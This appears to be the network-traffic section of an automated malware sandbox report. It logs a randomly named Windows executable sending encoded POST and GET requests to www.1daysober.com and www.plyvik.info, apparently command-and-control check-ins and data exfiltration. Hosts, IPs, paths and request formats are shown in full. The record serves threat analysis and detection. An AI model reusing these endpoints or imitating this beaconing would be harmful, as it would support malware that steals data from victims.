                                                                      Date: Wed, 06 Nov 2024 04:22:49 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 72 50 4c 63 3d 4b 6e 62 34 52 26 30 38 72 6c 3d 4e 33 37 2f 39 68 32 38 64 46 71 54 46 54 62 79 6e 49 63 2b 4f 31 7a 6e 73 65 56 78 48 49 58 5a 45 37 44 58 6e 69 42 31 77 6e 67 49 78 6c 43 72 6e 45 79 4f 47 76 73 41 64 4b 78 6a 72 70 36 37 65 74 49 67 38 4a 55 62 45 59 48 6c 2b 37 43 58 78 6d 33 6d 32 6a 74 45 58 72 5a 72 4b 41 6c 68 6b 32 78 51 77 62 69 6a 76 57 34 57 30 62 4a 6a 67 75 76 75 6b 32 31 41 4a 44 33 49 49 70 4a 72 39 5a 4f 58 6e 73 51 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IrPLc=Knb4R&08rl=N37/9h28dFqTFTbynIc+O1znseVxHIXZE7DXniB1wngIxlCrnEyOGvsAdKxjrp67etIg8JUbEYHl+7CXxm3m2jtEXrZrKAlhk2xQwbijvW4W0bJjguvuk21AJD3IIpJr9ZOXnsQ="}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.6499993.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:54.568655968 CET750OUTPOST /q5gi/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.1daysober.com
                                                                      Origin: http://www.1daysober.com
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.1daysober.com/q5gi/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 64 7a 62 65 2b 66 59 65 79 52 57 4d 47 68 76 6f 66 53 73 66 2b 68 4e 35 6a 49 37 42 34 38 39 72 48 35 37 66 57 32 31 77 34 66 7a 55 58 50 78 57 77 52 59 73 56 32 77 33 74 45 6d 6e 50 4e 51 4e 70 32 69 37 54 6a 75 44 52 51 56 55 37 6d 71 44 75 56 32 66 57 37 43 44 72 6b 64 49 34 4d 52 67 63 6c 6e 6b 43 53 2f 6b 74 4b 4d 7a 4b 45 6b 42 47 53 68 63 78 45 64 6e 35 6f 48 59 52 47 79 66 63 56 52 52 4b 39 2b 4e 5a 46 66 6d 54 77 78 4d 4c 31 48 55 6e 4f 79 52 2f 7a 65 49 45 67 69 50 5a 67 73 34 30 32 2b 6c 30 78 78 37 76 75 56 5a 43 55 65 68 63 61 79 79 6b 79 34 6f 78 5a 36 44 31 63 6f 4a 2b 54 56 4e 51 55 49 4a
                                                                      Data Ascii: 08rl=dzbe+fYeyRWMGhvofSsf+hN5jI7B489rH57fW21w4fzUXPxWwRYsV2w3tEmnPNQNp2i7TjuDRQVU7mqDuV2fW7CDrkdI4MRgclnkCS/ktKMzKEkBGShcxEdn5oHYRGyfcVRRK9+NZFfmTwxML1HUnOyR/zeIEgiPZgs402+l0xx7vuVZCUehcayyky4oxZ6D1coJ+TVNQUIJ


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.6500003.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:57.110697031 CET774OUTPOST /q5gi/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.1daysober.com
                                                                      Origin: http://www.1daysober.com
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.1daysober.com/q5gi/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 64 7a 62 65 2b 66 59 65 79 52 57 4d 41 42 2f 6f 4d 6c 41 66 33 68 4e 2b 73 6f 37 42 79 63 39 6e 48 35 6e 66 57 7a 51 39 34 74 58 55 51 74 70 57 7a 54 67 73 53 32 77 33 31 55 6d 6f 4c 4e 51 47 70 32 2b 46 54 67 32 44 52 51 52 55 37 6e 61 44 75 47 75 63 58 72 43 64 79 55 64 47 32 73 52 67 63 6c 6e 6b 43 53 62 4f 74 4f 67 7a 4b 56 55 42 41 44 68 66 74 55 64 6b 7a 49 48 59 56 47 79 62 63 56 51 32 4b 38 69 6e 5a 44 44 6d 54 78 42 4d 4c 68 54 58 75 4f 79 58 69 44 66 38 49 42 62 35 55 32 78 63 7a 56 57 57 6a 77 56 76 6a 34 49 44 65 6e 65 43 4f 4b 53 77 6b 77 67 61 78 35 36 70 33 63 51 4a 73 45 5a 71 66 67 74 71 53 76 69 59 6b 56 7a 7a 75 74 53 38 50 66 76 58 74 79 4b 58 6f 77 3d 3d
                                                                      Data Ascii: 08rl=dzbe+fYeyRWMAB/oMlAf3hN+so7Byc9nH5nfWzQ94tXUQtpWzTgsS2w31UmoLNQGp2+FTg2DRQRU7naDuGucXrCdyUdG2sRgclnkCSbOtOgzKVUBADhftUdkzIHYVGybcVQ2K8inZDDmTxBMLhTXuOyXiDf8IBb5U2xczVWWjwVvj4IDeneCOKSwkwgax56p3cQJsEZqfgtqSviYkVzzutS8PfvXtyKXow==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.6500013.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:59.659903049 CET1787OUTPOST /q5gi/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.1daysober.com
                                                                      Origin: http://www.1daysober.com
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.1daysober.com/q5gi/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 64 7a 62 65 2b 66 59 65 79 52 57 4d 41 42 2f 6f 4d 6c 41 66 33 68 4e 2b 73 6f 37 42 79 63 39 6e 48 35 6e 66 57 7a 51 39 34 74 66 55 58 59 39 57 78 79 67 73 54 32 77 33 72 45 6e 50 4c 4e 51 58 70 32 6d 42 54 67 37 30 52 53 5a 55 70 31 53 44 36 6e 75 63 5a 62 43 64 76 6b 64 4c 34 4d 51 39 63 6c 33 67 43 53 4c 4f 74 4f 67 7a 4b 57 38 42 52 53 68 66 2b 6b 64 6e 35 6f 48 45 52 47 79 33 63 56 59 4d 4b 38 57 64 5a 77 62 6d 51 52 52 4d 4b 53 37 58 68 4f 79 56 68 44 66 6b 49 41 6e 71 55 79 52 2b 7a 55 69 76 6a 78 74 76 67 70 74 4f 45 48 71 63 55 61 79 48 33 48 45 47 31 66 69 73 77 4e 55 72 71 48 64 34 59 41 6c 4b 4b 4b 4f 6c 33 55 33 77 74 39 54 56 51 72 2b 68 67 32 58 75 39 7a 72 4e 39 32 42 42 48 52 76 78 79 4c 51 41 36 62 4f 30 4b 6a 75 67 70 4e 69 39 55 6a 4a 6e 49 61 37 5a 65 68 55 61 70 67 68 47 64 51 33 77 2b 67 66 45 5a 6b 65 49 2f 77 75 32 63 31 64 7a 32 78 68 4a 68 4d 52 6b 5a 68 69 47 43 57 76 41 2b 4e 31 34 2b 55 73 67 56 2f 4c 50 4a 36 30 48 2f 6b 48 54 70 6a 61 63 53 37 70 56 70 [TRUNCATED]
                                                                      Data Ascii: 08rl=dzbe+fYeyRWMAB/oMlAf3hN+so7Byc9nH5nfWzQ94tfUXY9WxygsT2w3rEnPLNQXp2mBTg70RSZUp1SD6nucZbCdvkdL4MQ9cl3gCSLOtOgzKW8BRShf+kdn5oHERGy3cVYMK8WdZwbmQRRMKS7XhOyVhDfkIAnqUyR+zUivjxtvgptOEHqcUayH3HEG1fiswNUrqHd4YAlKKKOl3U3wt9TVQr+hg2Xu9zrN92BBHRvxyLQA6bO0KjugpNi9UjJnIa7ZehUapghGdQ3w+gfEZkeI/wu2c1dz2xhJhMRkZhiGCWvA+N14+UsgV/LPJ60H/kHTpjacS7pVpeKAGuhBFCHoYwrJ724god+Sw/M5MO5dNU0HLvSopFp9akO6/znHuCik1WQ60hnmvx1eIZWtaUyFQr9AX8dCBBv2sI4YUbmYqJ1ihHgsbgsnJhrRMcoqcaESQ+6FQvX2f7Y/aPiDoD4FxkRpScfg6rMvVve6zbIV7EW3tpxLoQQfbadRfYMxy36hZe5AN9O+StiuAMC70yvJ9t7MsEhAL6xhp62pP9e3TcyTwSURfMxcHXuJ9aoSxy+VRU0jRIIUp/0Q6GXglL0quJ6EeebAAwW5uJZpjXwa35m0WhuRiEQuhMkOaIfDGtP704EDlIR+ZzF6rHxnJYxYnuH7biUX2YXODBB8EZsLNIuspgobWsByiMn2MqqFjHecz+zn+Yq4Wxh8PlXq7do0WGw7Te5ck+MUNw0wfkDktWFW3Tfwezn2m1qBwqLgou9KgeLMNAXLsXwJ67LbyjMCsFYHnU2dU4FkpGuMWiEIAbdtPwQ3aGP9bQiyZcCoH7h2gtSe/dAV0+lXIXi+39g4441B7TwL+4+4zMeOc8q0bnCLqDe6TSLvPQBzqu5Ru289hfD73tNW8Po2HikSn5+GB8H5kROWNYNnMSr6FsTlOTDexjf6HE0QEAsGOvfobDavFg/VFOBVzfcN1/Bhz66X1QcXPEBVMgiBaWKGKnbas0a [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.6500023.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:02.195514917 CET487OUTGET /q5gi/?08rl=Qxz+9oQawQanAQHYdTYz9C9Qi+WU18FrCJDOUV5r+dn1dNZo7gMQdwRJpVqmN4EEk1WeYDWgHj4103TlxFaSFaPEmGUQsOZ0B0zIPDTJhKA7TnEqTx18z1JHq5v0eXuzQE4RJLA=&IrPLc=Knb4R HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.1daysober.com
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:23:02.816456079 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:23:02 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 30 38 72 6c 3d 51 78 7a 2b 39 6f 51 61 77 51 61 6e 41 51 48 59 64 54 59 7a 39 43 39 51 69 2b 57 55 31 38 46 72 43 4a 44 4f 55 56 35 72 2b 64 6e 31 64 4e 5a 6f 37 67 4d 51 64 77 52 4a 70 56 71 6d 4e 34 45 45 6b 31 57 65 59 44 57 67 48 6a 34 31 30 33 54 6c 78 46 61 53 46 61 50 45 6d 47 55 51 73 4f 5a 30 42 30 7a 49 50 44 54 4a 68 4b 41 37 54 6e 45 71 54 78 31 38 7a 31 4a 48 71 35 76 30 65 58 75 7a 51 45 34 52 4a 4c 41 3d 26 49 72 50 4c 63 3d 4b 6e 62 34 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?08rl=Qxz+9oQawQanAQHYdTYz9C9Qi+WU18FrCJDOUV5r+dn1dNZo7gMQdwRJpVqmN4EEk1WeYDWgHj4103TlxFaSFaPEmGUQsOZ0B0zIPDTJhKA7TnEqTx18z1JHq5v0eXuzQE4RJLA=&IrPLc=Knb4R"}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.65000367.223.117.142804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:07.856280088 CET744OUTPOST /yhso/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.plyvik.info
                                                                      Origin: http://www.plyvik.info
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.plyvik.info/yhso/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 6e 75 4a 71 33 30 34 65 4e 36 44 53 61 31 44 46 56 69 74 76 50 77 77 63 31 6e 64 6d 67 5a 6c 61 78 2f 61 65 39 6d 46 48 6c 68 43 50 75 6d 30 44 74 49 55 35 47 42 72 67 45 45 58 43 67 2b 67 59 61 36 41 6e 4f 4c 68 65 62 4e 31 6f 6d 54 54 4b 62 47 63 44 39 39 56 37 33 4d 71 4b 74 48 62 58 4d 6a 4f 7a 34 64 58 36 51 56 4e 56 7a 4d 6e 65 59 79 75 41 2f 44 6b 50 78 50 78 65 4b 4a 58 66 50 6c 36 55 6b 4d 2b 68 70 38 49 48 6a 36 42 2b 66 79 61 48 39 73 44 4e 56 2f 45 64 6b 70 31 47 4e 78 6e 54 33 65 39 6e 62 6f 56 62 57 6b 72 74 51 75 66 52 31 51 58 4e 4c 4d 47 35 41 4d 34 43 4e 4b 42 6f 78 56 66 35 77 52 32 44
                                                                      Data Ascii: 08rl=nuJq304eN6DSa1DFVitvPwwc1ndmgZlax/ae9mFHlhCPum0DtIU5GBrgEEXCg+gYa6AnOLhebN1omTTKbGcD99V73MqKtHbXMjOz4dX6QVNVzMneYyuA/DkPxPxeKJXfPl6UkM+hp8IHj6B+fyaH9sDNV/Edkp1GNxnT3e9nboVbWkrtQufR1QXNLMG5AM4CNKBoxVf5wR2D
                                                                      Nov 6, 2024 05:23:08.525800943 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:08 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.65000467.223.117.142804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:10.403677940 CET768OUTPOST /yhso/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.plyvik.info
                                                                      Origin: http://www.plyvik.info
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.plyvik.info/yhso/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 6e 75 4a 71 33 30 34 65 4e 36 44 53 62 57 4c 46 58 44 74 76 4a 51 77 54 72 33 64 6d 71 35 6c 65 78 2f 57 65 39 6e 78 58 6b 54 57 50 75 44 49 44 38 38 41 35 46 42 72 67 63 55 58 4c 2b 4f 67 70 61 36 39 51 4f 4c 64 65 62 4e 68 6f 6d 53 6a 4b 61 31 30 41 37 74 56 35 69 63 71 49 31 6e 62 58 4d 6a 4f 7a 34 64 79 56 51 56 46 56 7a 2f 2f 65 59 54 75 44 6b 6a 6b 4d 32 50 78 65 48 70 58 54 50 6c 37 78 6b 4f 61 48 70 35 4d 48 6a 34 70 2b 66 6a 61 45 32 73 44 50 4b 76 46 6a 72 35 70 4e 45 7a 61 73 35 64 46 2f 62 2f 70 73 54 53 32 33 4d 64 66 79 6e 41 33 50 4c 4f 65 4c 41 73 34 6f 50 4b 35 6f 6a 43 54 65 2f 6c 54 67 79 38 6e 30 34 45 76 42 6c 35 54 52 39 34 75 77 65 56 56 64 78 41 3d 3d
                                                                      Data Ascii: 08rl=nuJq304eN6DSbWLFXDtvJQwTr3dmq5lex/We9nxXkTWPuDID88A5FBrgcUXL+Ogpa69QOLdebNhomSjKa10A7tV5icqI1nbXMjOz4dyVQVFVz//eYTuDkjkM2PxeHpXTPl7xkOaHp5MHj4p+fjaE2sDPKvFjr5pNEzas5dF/b/psTS23MdfynA3PLOeLAs4oPK5ojCTe/lTgy8n04EvBl5TR94uweVVdxA==
                                                                      Nov 6, 2024 05:23:11.082226038 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:10 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.65000567.223.117.142804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:23:12.951807022 CET1781OUTPOST /yhso/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.plyvik.info
                                                                      Origin: http://www.plyvik.info
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.plyvik.info/yhso/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 6e 75 4a 71 33 30 34 65 4e 36 44 53 62 57 4c 46 58 44 74 76 4a 51 77 54 72 33 64 6d 71 35 6c 65 78 2f 57 65 39 6e 78 58 6b 54 4f 50 76 32 45 44 75 75 6f 35 4b 68 72 67 43 45 58 4f 2b 4f 67 77 61 36 6c 63 4f 4c 52 4f 62 4f 5a 6f 6b 77 72 4b 64 45 30 41 79 74 56 35 67 63 71 4a 74 48 62 4f 4d 69 69 33 34 64 43 56 51 56 46 56 7a 35 37 65 65 43 75 44 6a 54 6b 50 78 50 78 43 4b 4a 58 33 50 68 58 4c 6b 4f 4f 78 71 4e 34 48 6a 59 5a 2b 51 78 43 45 71 38 44 4a 4c 76 46 72 72 35 6b 56 45 33 37 58 35 63 78 42 62 34 42 73 51 32 71 70 58 65 57 75 39 79 6a 57 54 66 69 67 4a 71 6b 4e 51 35 35 67 6a 54 72 65 2b 30 2f 55 37 4a 57 69 79 6d 79 35 71 2f 75 78 79 6f 48 30 58 6c 34 50 6b 65 57 4a 48 4a 33 51 63 53 41 45 32 48 4f 6c 2b 6f 69 64 64 72 76 72 54 72 42 38 49 2b 32 58 73 2b 6a 4d 4f 49 67 51 2f 4e 4f 41 53 5a 41 4d 4b 4a 61 47 6e 48 67 4e 42 68 4d 5a 4e 6d 69 55 67 56 70 7a 33 4c 58 34 6d 67 6d 51 67 55 50 58 72 78 52 51 4b 52 35 47 6e 65 2f 69 64 52 41 31 75 56 66 51 63 30 64 39 46 51 49 72 45 [TRUNCATED]
                                                                      Data Ascii: 08rl=nuJq304eN6DSbWLFXDtvJQwTr3dmq5lex/We9nxXkTOPv2EDuuo5KhrgCEXO+Ogwa6lcOLRObOZokwrKdE0AytV5gcqJtHbOMii34dCVQVFVz57eeCuDjTkPxPxCKJX3PhXLkOOxqN4HjYZ+QxCEq8DJLvFrr5kVE37X5cxBb4BsQ2qpXeWu9yjWTfigJqkNQ55gjTre+0/U7JWiymy5q/uxyoH0Xl4PkeWJHJ3QcSAE2HOl+oiddrvrTrB8I+2Xs+jMOIgQ/NOASZAMKJaGnHgNBhMZNmiUgVpz3LX4mgmQgUPXrxRQKR5Gne/idRA1uVfQc0d9FQIrEffe+q6ZAPX0znE0b3zBdxCYd7OCDt9AlFPw/hcn0UicL2GO2k9iYqo0GnlixwjUBPDLYRT3VznXYp7jHeXscYXyPwa+CSQlbChvJRMaTcSGU6U1NmK1bf3en0MI1j92tapE7clk2x6vuDJSzAx44PLifoe8e5Pfgp6Lik4VvpCVvKq13EKyx7GC7hhAvdgm2Chp2bazV/XKPqIg/LyeElsZFPGwJ/EoUXxIb9pkeaXJyBsH5dmtsJbzkrmtyoZ5oZBKkMyAqjKO3UzODK3WsfN8jBGJCL8GACJYQPS5Zo6G3ePPfQu3U2cGX1HBx+BIeiYBpHy2FuDkxDXhxiLaBVWqPUuJHl7/KsdlQM3yCJ3iaeP3ykRAicUZ8otNgEJ2VzXS7zsysbn9+fsSNdTrb6Epe6cQ0jiqkV7Zf/QdSCx01ONO85U40+QzDGk+kQ98y4bAmyvcIoTQVdG1vKj8/8V9dxu44gUdGsWCaJP7QSXvD2lrBC0KbCqqNTBPj33SBzoAeLBwEgfCll65Hh9uzzOimrVpjYR7mp+OjUcH2yqfxZUKyB4FK2ejHpgKqKlIbEl3agdA8OMJT5+JYpoMkq7BT94l+uje0LzaMzw0ryV2TT7sp0/TtvC0+05wmPmqdbOKUUzpicBjxZ7zp6yxJLb83jJjTiaAMVr [TRUNCATED]
                                                                      Nov 6, 2024 05:23:13.629887104 CET533INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:23:13 GMT
                                                                      Server: Apache
                                                                      Content-Length: 389
                                                                      Connection: close
                                                                      Content-Type: text/html
